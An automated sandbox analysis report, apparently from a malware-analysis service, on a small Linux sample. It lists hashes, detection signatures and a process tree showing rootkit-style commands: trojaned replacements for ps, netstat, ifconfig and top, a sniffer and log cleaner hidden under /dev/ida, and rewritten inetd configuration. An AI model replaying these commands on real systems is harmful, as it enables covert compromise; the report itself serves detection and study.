Analysis
-
max time kernel
2s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/10/2024, 05:39
Static task
static1
Behavioral task
behavioral1
Sample
65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
Resource
debian9-mipsel-20240418-en
General
-
Target
65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
-
Size
7KB
-
MD5
65ae1a65bae6f9b863a267a1b4c5c504
-
SHA1
ae499c63c577d711443006769bff6f4ba2e16223
-
SHA256
522a265328fefca0a92ab30be590802539eb625b536931fe3be5f1e816276954
-
SHA512
9bafd52bae1d04dd2172aa8c9a1a2e231f33dace2c639034c76c8c46add067e462134f1caf48c8ff84be3b6ec7f386d1e9e1e28dd0a98ecf86cd9a294cd7ec0f
-
SSDEEP
96:BvKkP1ISsoGmiSVSoSdS9SqnU5vKkP1ISsoGmiSVSoSdS9SqnUd:BvKGISsoDAV4YqU5vKGISsoDAV4YqUd
Malware Config
Signatures
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Virtualization/Sandbox Evasion: Time Based Evasion 1 TTPs 2 IoCs
Adversaries may detect and evade virtualized environments and sandboxes.
pid Process 1549 uptime 1602 uptime -
Checks CPU configuration 1 TTPs 8 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo cat File opened for reading /proc/cpuinfo cat File opened for reading /proc/cpuinfo cat File opened for reading /proc/cpuinfo cat File opened for reading /proc/cpuinfo cat File opened for reading /proc/cpuinfo cat File opened for reading /proc/cpuinfo cat File opened for reading /proc/cpuinfo cat -
Reads CPU attributes 1 TTPs 2 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online uptime File opened for reading /sys/devices/system/cpu/online uptime -
description ioc Process File opened for reading /proc/16/stat killall File opened for reading /proc/1/stat killall File opened for reading /proc/15/cmdline killall File opened for reading /proc/161/stat killall File opened for reading /proc/245/stat killall File opened for reading /proc/1063/stat killall File opened for reading /proc/1121/cmdline killall File opened for reading /proc/filesystems mv File opened for reading /proc/164/stat killall File opened for reading /proc/filesystems cp File opened for reading /proc/172/stat killall File opened for reading /proc/1121/stat killall File opened for reading /proc/14/stat killall File opened for reading /proc/997/cmdline killall File opened for reading /proc/1140/stat killall File opened for reading /proc/1177/stat killall File opened for reading /proc/526/stat killall File opened for reading /proc/1163/stat killall File opened for reading /proc/1259/cmdline killall File opened for reading /proc/3/stat killall File opened for reading /proc/526/stat killall File opened for reading /proc/1142/stat killall File opened for reading /proc/1317/stat killall File opened for reading /proc/663/cmdline killall File opened for reading /proc/22/stat killall File opened for reading /proc/1171/stat killall File opened for reading /proc/filesystems killall File opened for reading /proc/36/stat killall File opened for reading /proc/79/cmdline killall File opened for reading /proc/1059/stat killall File opened for reading /proc/610/stat killall File opened for reading /proc/1180/stat killall File opened for reading /proc/36/cmdline killall File opened for reading /proc/650/stat killall File opened for reading /proc/27/stat killall File opened for reading /proc/414/stat killall File opened for reading /proc/431/cmdline killall File opened for reading /proc/1101/cmdline killall File opened for reading /proc/428/stat killall File opened for reading /proc/1135/cmdline killall File opened for reading /proc/1258/stat killall File opened for reading /proc/438/stat killall File opened for reading /proc/485/stat killall File opened for reading /proc/333/stat killall File opened for reading /proc/9/stat killall File opened for reading /proc/10/stat killall File opened for reading /proc/24/stat killall File opened for reading /proc/17/stat killall File opened for reading /proc/761/stat killall File opened for reading /proc/1502/stat killall File opened for reading /proc/80/stat killall File opened for reading /proc/115/stat killall File opened for reading /proc/1086/stat killall File opened for reading /proc/166/stat killall File opened for reading /proc/115/stat killall File opened for reading /proc/165/stat killall File opened for reading /proc/525/stat killall File opened for reading /proc/35/stat killall File opened for reading /proc/1240/stat killall File opened for reading /proc/1379/stat killall File opened for reading /proc/1073/cmdline killall File opened for reading /proc/1316/stat killall File opened for reading /proc/1342/cmdline killall File opened for reading /proc/325/cmdline killall -
System Network Configuration Discovery 1 TTPs 8 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1617 grep 1511 rm 1512 mv 1544 ifconfig 1561 grep 1570 rm 1571 mv 1600 ifconfig -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/computer 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
Processes
-
/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes1181⤵
- Writes file to tmp directory
PID:1508 -
/usr/bin/clearclear2⤵PID:1509
-
-
/bin/chownchown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 config-err-ESwDdV netplan_1iwncm7z snap-private-tmp ssh-GMXqXanC5C0k systemd-private-1020e78908244756830a6344ed1599c8-ModemManager.service-zJco20 systemd-private-1020e78908244756830a6344ed1599c8-bolt.service-lYyowF systemd-private-1020e78908244756830a6344ed1599c8-colord.service-J3gw7N systemd-private-1020e78908244756830a6344ed1599c8-systemd-resolved.service-9XdSFd systemd-private-1020e78908244756830a6344ed1599c8-systemd-timedated.service-hjXspn2⤵PID:1510
-
-
/bin/rmrm -rf /sbin/ifconfig2⤵
- System Network Configuration Discovery
PID:1511
-
-
/bin/mvmv ifconfig /sbin/ifconfig2⤵
- System Network Configuration Discovery
PID:1512
-
-
/bin/rmrm -rf /bin/netstat2⤵PID:1513
-
-
/bin/mvmv netstat /bin/netstat2⤵PID:1514
-
-
/bin/rmrm -rf /bin/ps2⤵PID:1515
-
-
/bin/mvmv ps /bin/ps2⤵PID:1516
-
-
/bin/rmrm -rf /usr/bin/top2⤵PID:1517
-
-
/bin/mvmv top /usr/bin/top2⤵PID:1518
-
-
/bin/cpcp -f mkxfs /usr/sbin/2⤵PID:1519
-
-
/usr/bin/touchtouch /dev/rpm2⤵PID:1520
-
-
/usr/bin/touchtouch /dev/last2⤵PID:1521
-
-
/bin/mkdirmkdir -p /dev/ida/.drag-on2⤵PID:1522
-
-
/bin/mkdirmkdir -p "/dev/ida/.. "2⤵PID:1523
-
-
/bin/cpcp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/2⤵PID:1524
-
-
/bin/cpcp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed "/dev/ida/.. "2⤵
- Reads runtime system information
PID:1525
-
-
/bin/rmrm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed2⤵PID:1526
-
-
/usr/bin/touchtouch /dev/ida/.drag-on/tcp.log2⤵PID:1527
-
-
/usr/bin/touchtouch "/dev/ida/.. /tcp.log"2⤵PID:1528
-
-
/bin/cpcp -f inetd.conf /etc2⤵PID:1529
-
-
/bin/cpcp -f services /etc2⤵PID:1530
-
-
/usr/bin/killallkillall -HUP inetd2⤵
- Reads runtime system information
PID:1531
-
-
/bin/rmrm -rf /usr/bin/lsattr2⤵PID:1532
-
-
/bin/cpcp -f lsattr /usr/bin/2⤵PID:1533
-
-
/bin/chmodchmod 500 /usr/bin/lsattr2⤵PID:1534
-
-
/usr/bin/chattrchattr +i /usr/bin/lsattr2⤵PID:1535
-
-
/usr/bin/lsattr/usr/bin/lsattr2⤵PID:1536
-
-
/bin/sleepsleep 12⤵PID:1537
-
-
/bin/unameuname -a2⤵PID:1541
-
-
/bin/hostnamehostname -f2⤵PID:1542
-
-
/sbin/ifconfig/sbin/ifconfig2⤵
- System Network Configuration Discovery
PID:1544
-
-
/bin/grepgrep inet2⤵PID:1545
-
-
/usr/bin/uptimeuptime2⤵
- Virtualization/Sandbox Evasion: Time Based Evasion
- Reads CPU attributes
PID:1549
-
-
/bin/grepgrep vendor_id2⤵PID:1552
-
-
/bin/catcat /proc/cpuinfo2⤵
- Checks CPU configuration
PID:1551
-
-
/bin/grepgrep model2⤵PID:1555
-
-
/bin/catcat /proc/cpuinfo2⤵
- Checks CPU configuration
PID:1554
-
-
/bin/grepgrep MHz2⤵PID:1558
-
-
/bin/catcat /proc/cpuinfo2⤵
- Checks CPU configuration
PID:1557
-
-
/bin/grepgrep bogomips2⤵
- System Network Configuration Discovery
PID:1561
-
-
/bin/catcat /proc/cpuinfo2⤵
- Checks CPU configuration
PID:1560
-
-
/bin/dfdf -h2⤵PID:1562
-
-
/bin/catcat computer2⤵PID:1563
-
-
/bin/catcat computer2⤵PID:1565
-
-
/bin/rmrm -rf last lk.tgz computer lk.tar.gz2⤵PID:1567
-
-
/usr/bin/clearclear2⤵PID:1568
-
-
/bin/chownchown root.root bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin snap srv swapfile sys tmp usr var vmlinuz vmlinuz.old2⤵PID:1569
-
-
/bin/rmrm -rf /sbin/ifconfig2⤵
- System Network Configuration Discovery
PID:1570
-
-
/bin/mvmv ifconfig /sbin/ifconfig2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1571
-
-
/bin/rmrm -rf /bin/netstat2⤵PID:1572
-
-
/bin/mvmv netstat /bin/netstat2⤵PID:1573
-
-
/bin/rmrm -rf /bin/ps2⤵PID:1574
-
-
/bin/mvmv ps /bin/ps2⤵PID:1575
-
-
/bin/rmrm -rf /usr/bin/top2⤵PID:1576
-
-
/bin/mvmv top /usr/bin/top2⤵PID:1577
-
-
/bin/cpcp -f mkxfs /usr/sbin/2⤵PID:1578
-
-
/usr/bin/touchtouch /dev/rpm2⤵PID:1579
-
-
/usr/bin/touchtouch /dev/last2⤵PID:1580
-
-
/bin/mkdirmkdir -p /dev/ida/.drag-on2⤵PID:1581
-
-
/bin/mkdirmkdir -p "/dev/ida/.. "2⤵PID:1582
-
-
/bin/cpcp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/2⤵PID:1583
-
-
/bin/cpcp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed "/dev/ida/.. "2⤵PID:1584
-
-
/bin/rmrm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed2⤵PID:1585
-
-
/usr/bin/touchtouch /dev/ida/.drag-on/tcp.log2⤵PID:1586
-
-
/usr/bin/touchtouch "/dev/ida/.. /tcp.log"2⤵PID:1587
-
-
/bin/cpcp -f inetd.conf /etc2⤵PID:1588
-
-
/bin/cpcp -f services /etc2⤵PID:1589
-
-
/usr/bin/killallkillall -HUP inetd2⤵
- Reads runtime system information
PID:1590
-
-
/bin/rmrm -rf /usr/bin/lsattr2⤵PID:1591
-
-
/bin/cpcp -f lsattr /usr/bin/2⤵PID:1592
-
-
/bin/chmodchmod 500 /usr/bin/lsattr2⤵PID:1593
-
-
/usr/bin/chattrchattr +i /usr/bin/lsattr2⤵PID:1594
-
-
/usr/bin/lsattr/usr/bin/lsattr2⤵PID:1595
-
-
/bin/sleepsleep 12⤵PID:1596
-
-
/bin/unameuname -a2⤵PID:1597
-
-
/bin/hostnamehostname -f2⤵PID:1598
-
-
/bin/grepgrep inet2⤵PID:1601
-
-
/sbin/ifconfig/sbin/ifconfig2⤵
- System Network Configuration Discovery
PID:1600
-
-
/usr/bin/uptimeuptime2⤵
- Virtualization/Sandbox Evasion: Time Based Evasion
- Reads CPU attributes
PID:1602
-
-
/bin/grepgrep vendor_id2⤵PID:1608
-
-
/bin/catcat /proc/cpuinfo2⤵
- Checks CPU configuration
PID:1607
-
-
/bin/grepgrep model2⤵PID:1611
-
-
/bin/catcat /proc/cpuinfo2⤵
- Checks CPU configuration
PID:1610
-
-
/bin/grepgrep MHz2⤵PID:1614
-
-
/bin/catcat /proc/cpuinfo2⤵
- Checks CPU configuration
PID:1613
-
-
/bin/grepgrep bogomips2⤵
- System Network Configuration Discovery
PID:1617
-
-
/bin/catcat /proc/cpuinfo2⤵
- Checks CPU configuration
PID:1616
-
-
/bin/dfdf -h2⤵PID:1618
-
-
/bin/catcat computer2⤵PID:1619
-
-
/bin/catcat computer2⤵PID:1621
-
-
/bin/rmrm -rf last lk.tgz computer lk.tar.gz2⤵PID:1623
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
241B
MD51a82e4272e1c87385b059ebf8fd52572
SHA16c37312c8e55e2744cd3ad6f90123cadfaab9b4f
SHA2565677d976c62a498530ded5fb30a75ce7053ec8df2e0b100895d3e287099b4f73
SHA5123e3ce36da4d382d203c2e57b0d2a60a6ca06e84276789d45b87bca01c5957790b12616267110fa1c3ad2d118c7f99353b52c4fc667dc854d241d1d95f1206ada
-
Filesize
284B
MD5859a800e55a211f6982b0411ba7421a9
SHA1215f7a2227c88d52e56cdd4ec5de93c433d94498
SHA256765d9173db6604d3d12dfff59628e66bbdd77e1360de5098991b187b545856f6
SHA51274504ed28ccaa638395dff595238094b33ad768d579c7a6162f027142fcbcff2cae057a37373f70c99c2cc95ccc37863a15fd95cc0a5e645a5efdefa45574d3a
-
Filesize
809B
MD549bb556f7073a5a0a9febdc2b99857b8
SHA1d8f1c8d341e6fb668c99e99b5fafb7a929602cc7
SHA25625351496d9265f403fe0324d7637c6a8963ee39bf89a467e4e20ef952049b864
SHA512a98993b63bbe9907b428c5f3cce23785066e66141a9fceb471667c9280483404e820516ac7b07e1239d597a1fed34b2b0a8a5c74aad0bbc4c6d0f10061004bee
-
Filesize
41B
MD581ef1d399417bc7c03d5454d426e0e30
SHA1e830de7de2fedc8688ded4335b6be7f0dcc2cf13
SHA2566fff47dbd5fd120ab99a02baa33485f872f066beb802da8a594dabfcd43ae89b
SHA51289551b76b13cecc8e295a11b0c9e7a334e2448202461a58f1dd14398a9f92d9b56089b285e3cfae9b950b88dc8f8aa48a812cef8bd1aa6696be51edb62adfbeb
-
Filesize
49B
MD5ea4abc4909616408ea03fca58e9daf78
SHA1c368533d40cbcf2d43c2b0f493bced7496fedafd
SHA256574eb71079a9afe0d64c42a205368f6df46e1de0c98d28e3ba145045dba86ced
SHA51292a1b480592675ff260a8659c179e788e50fbc846562ac2dbe9f5f11fbfd8bb6b3d2574c9c51a2f08ea506e5b719d4ca528ae5a1a51dd6a930425462eee4ab75
-
Filesize
87B
MD5a2e384cb9bf939430cc6d44800052952
SHA13cafe08a106154033956aa6bbf2605e0ac94c290
SHA25689558b7545ed41e4938774fac4e78696d61eb06a6f20755a2aa056becf3f8532
SHA51261aae5e24e101efab9db03dd6118fc95252c39088310b1d1172738565a456bb11d9a5ad84df82b2346d0ba4aae10f798889fe566c4a44e48f3a376f279d72058
-
Filesize
14B
MD529b9e96e561662774c048aaf62f63f99
SHA10765b1eaf2054c54fe82e1326617d919f5f200fc
SHA25676025f97d8ea5be475bad1e9ba9579059ef456583b63a71fcef9bbe055e865ec
SHA5121db52eabbd3250a830155d0ad8b486c4dbe5fbf043f9bd45b6cf8982cae4c974e4cfe862f74824e091905b79d8cde6a6c6c71541a782aaf9e917282612eb457a
-
Filesize
28B
MD5ed90c163bc4809cfba41afe945d8c3ac
SHA13fc77c1038907a6540022911bb9f74ab260ed576
SHA2561b70087ed15d011f96f1c7ee24133cdb96fa80e07d9086bac204f46663ad9954
SHA512a2ad80478649090d1294be13b410e2434a170aa027d1e5329c30ea805b8d8c5c0e8f018cd8183c7bd2bfe7fd4ed0cd351c8ac8e78503f250cc352726a4442917
-
Filesize
6B
MD54e6ac6c2a2fecfe1e88ed9ef72c2d2cd
SHA176015ef9244670de728b830ad330c536f42c4e39
SHA256625d8ffa241021399ea6cf2f8f6ceaa5b19bee660bed532ef6c7dbead906917c
SHA5121c8c0e2a26bb9cbef13ececacda94d9e8403646eb120596540bf040e672338b5c21333f1172d1822b5c87419a35437ea111324c5b0e3196d35407acf74e544f7
-
Filesize
14B
MD57d298531c8d0893706bf9c76a40f8386
SHA136f5cc01e0b6bcac92aa01055f3eb1bf45bf36bf
SHA25603d0ea06da1c004ba7e1ae10d04444e235a4b8cf8451d610f771c539d1387f1a
SHA51238f915c4921b801fe5b560fd9be4bc92705ee1376812f377d15a41bf2424f7e7324ea6cc6e103acee23940a4a8c93f1829a2b20fd5c3c22bb5542ce17d2ad973
-
Filesize
27B
MD51894a58fd103ccce773c667411597492
SHA1248701dcabbff132054e34fd86f9afbd3746ea38
SHA2560b3158157a0891176e648dca6743c6f62c2a0ea6c5ba7f33bc8740ae42513d12
SHA512c3c622fcac2163a71132dc706cf26b4e87912ee9fb13b593708d6c71c8a72fcca1b34bc97e6cf6f732308ac30475b2f047e2a315162f7314c24ae65413561f9a
-
Filesize
35B
MD51d0177d6d6d055555eb272249d89f54d
SHA16137ecd54c6ca43dbe4bc63a030b817a94a2a5e3
SHA256cab38856d96e2273d9ca9e8eec5c4428dea21d90fcc1005d23d43db7508b9c9e
SHA512fad8ef62c3c5316497524e6c0101ed3e57b09ec892f902849d771d682b90430a6b7a588e1e10f8c93f01feb9f5f702bf1bcd5b8be2e12dfbcdbfec2b024e22ab
-
Filesize
71B
MD5a56a4ee13c1681711fb6217ec17a8abc
SHA16193fa49399265b3efbc7ec47760a23749a278a3
SHA256610c4e3a32f6e1fb38d082ed6ed86b1c0fcc42314df0e6d8f5c7ea70afb6dba4
SHA51286d576cf220f3a37ced1348aad2d799c692a13206d1709537123a7726174481ab9cb1fcf9f5046b072ff657e4becb0ae7ee83b8d5e18ef317930fe8de2cc0ec0
-
Filesize
141B
MD574b613a2b176f69fe5c1e8d954eab63a
SHA112cb70fe1ffa49af49c298b543457662dc03abfc
SHA256642aaf59eddd25f2db9dcbb56abbfbaadf44f6a56c0cdae642f29d4fb99aa10f
SHA51254aae87c0c4104844a5900e29c38be09fa6f5e542ed63110d706cf85b208197d737397ca34eec88b1d04082ae5219651ebe7781cf60d1316a31c41165f760bda
-
Filesize
155B
MD50e60c2ce6cd47252c914ff3178290d15
SHA1793e6bdb39acd41403f09ab838d4b0ed484898a7
SHA256fc3631bac155e2062dcfa1f7208da8a0ea1bf137bf9dbe38f291a04c777cf106
SHA512adeb4ab5f385df28a1a5d26c652ba08cd1b02daedf47dd5089a23f26d38fc40a6c8738dd3c08c611440751045a69004aa4b1b4da3e0d02613f366698be8a21b6
-
Filesize
169B
MD5b411c1efe8afb4fc961fd64b8d6bfe35
SHA1696a2b6b186b2cd349f34196aa18ae30f297207d
SHA256c24169b2463eb9ea0ad37721d2cb7c429b90c5d436b71ad32052c814951c57ae
SHA512ae647a8186c201e08695c6b3bc1a89c5dfe59fe21d7e4584d98ea4855cf02c66ede247b08ac7820ceaf60cb5bae7475bccc315f7e791940d3fd3e5353a9d42eb
-
Filesize
241B
MD5e65718451e7f82b785a62b4dbb2dfe68
SHA12da2a421d8cd9bc35f9f2722dbce3b8c28e724f9
SHA25625ed323c38ba36d3768f8c1bb1a67f9326e2b6e6b49a3cfe978f553547442005
SHA512cac0ef0d8827fbae52525d4142d15a0df5ce987b32c441329601c3958387c1383cd57386b80d73345358a03fe2e9fe4885359af7978f18d654c9ff9cab60c0c4
-
Filesize
284B
MD5c67f98b628b6ebae60f90357a88bae58
SHA1312f8128b79009ed53cef92debefbf31fd5f24b4
SHA25602f39a0d057762b6622a8143bde2fc99474f1d8adc424bc39954e3708525d04b
SHA512f1b7120165ca294fdc6695b6f76df9908e844ebc4bea44d010e3f963f13791afb5878ccf7e59e8ff0c76ca19e609dc600018c76784fbfccc64f82c0c03908bb1
-
Filesize
809B
MD5677a328e881f15f87509a110101a558a
SHA124f19a9ad1061bd54522ef4ebbfe6a63355472b6
SHA256c006a0ae3ed9e83412e4231c98c23095ea47f2a7a5daa1dae68a66a7136de26b
SHA512e39f7af709956680221277326d493bb58d0fd4666fedfebcd3ef554b8882782bf1787c8a9c35c8e8373fe5a47b617ec9f6bf6ab7c7cf68da3a1a4ed62604d1bb